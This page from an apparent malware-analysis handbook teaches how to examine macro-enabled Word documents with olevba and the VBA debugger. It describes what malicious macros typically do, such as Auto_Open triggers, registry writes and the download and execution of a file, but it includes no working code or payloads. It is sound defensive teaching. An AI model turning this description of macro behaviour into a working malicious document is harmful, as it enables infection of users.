Malware Handbook
  • Preface
  • Author
  • Prerequisites for Malware
  • Prerequisites for Lab Set-Up
  • Setting Up Labs
  • Download Sample Malware Exercises
  • Intro to Assembly Language
  • Assembly Language Basics
  • Commonly Used Instructions
  • Win32 Assembly Programming
  • PE Format
    • PE32
    • PE32+
  • Malware
    • Types of Malware
    • Malware Classification by Windows Defender
    • Sourcing Malware
  • Malware Development
  • Malware Analysis
    • Malware Analysis Methodologies
      • Static Analysis
        • Static Analysis Tools/Methods
        • Static Analysis of Sample Files
      • Dynamic Analysis
        • Dynamic Analysis Tools/Methods
        • Analyzing Files with Regshot, Process Monitor, and Wireshark
        • Analyzing calc.exe and Network Activity
      • Manual Code Reversing
        • Reverse Engineering Simple Windows Executable Files
        • Reverse Engineering re_lotsastuff.exe
        • Reverse Engineering re_lotsastuff.exe Using Ghidra
      • Analyzing PowerShell Scripts
      • Analyzing JavaScript Samples
        • Analyzing JavaScript in HTML
      • Analyzing Macro Code in Office Documents
      • Setting Up REMnux Environment
        • Setting Up and Configuring FakeNet in REMnux
      • Analyzing an ELF File
      • Analyzing ASPX Webshells
      • Analyzing JAR Files
    • SAMPLE NOTES (of Notes.txt)
Powered by GitBook
On this page
  1. Malware Analysis
  2. Malware Analysis Methodologies

Analyzing Macro Code in Office Documents

PreviousAnalyzing JavaScript in HTMLNextSetting Up REMnux Environment

Last updated 9 months ago

Tools Used:

  1. Oletools (OLEVBA): A Python-based suite of tools used to analyze and extract VBA source code from Office documents.

  2. Microsoft Word: Used to debug macro code through the VBA Developer Tools.

Steps for Analyzing Macro-Enabled Documents:

  1. Initial Setup:

    • Revert the VM Snapshot, copy the course files, and run Fakenet.

    • Open the command prompt in the folder where the sample document is located.

  2. Static Analysis with OLEVBA:

    • Execute the command olevba re_test_dlx.doc to analyze the document.

    • OLEVBA provides a summary of the analysis, including potential trigger points such as Auto_Open and Document_Open.

    • Redirect the output to a text file for easier navigation: olevba re_test_dlx.doc > olevba_result.txt.

    • Key Points to Analyze:

      • Focus on trigger points like Auto_Open and Document_Open.

      • Inspect the code for functions like MsgBox (displays a message), internet connections, registry modifications, and file executions.

  3. Understanding the Macro Code:

    • Analyze the flow of the macro:

      • The macro might display a message, connect to the internet, create a registry entry, and finally execute a file.

    • Pay attention to the usage of functions like RegWrite (registry modification) and Shell (command execution).

    • Look for obfuscation techniques like the use of avg function, which may indicate encrypted or encoded strings.

  4. Dynamic Analysis with Microsoft Word:

    • Open the document in Microsoft Word (e.g., Word 2013).

    • Setting Breakpoints:

      • Use Alt + F11 to open the VBA Developer Window.

      • Navigate to the Document_Open subroutine and add an End function to prevent immediate execution of the macro.

      • Set a breakpoint at the first line of the subroutine.

    • Debugging:

      • Enable macro content in the Word document to trigger execution.

      • Return to the VBA editor and step through the code using F8.

      • Skip decrypting functions if not needed using Shift + F8, but it's essential to understand the decryption algorithm.

      • Use the Watch Window to monitor variables and expressions, especially to observe decrypted text or key indicators of compromise (IOCs).

  5. Key Observations:

    • Identify network activity, such as GET requests and the corresponding URLs.

    • Detect the creation of persistent mechanisms (e.g., writing to the registry).

    • Observe any execution of downloaded or created files, such as badfile.exe.

Summary:

  • OLEVBA is used for static analysis, helping to identify key functions and trigger points within the macro code.

  • Microsoft Word's VBA Editor is essential for dynamic analysis, allowing step-by-step debugging to understand the macro's behavior fully.

  • Key techniques include setting breakpoints, skipping unnecessary decryption steps, and using the Watch Window to monitor variables and expressions.

These notes cover the fundamental steps and observations when analyzing macro-enabled Word documents for potential malicious activity.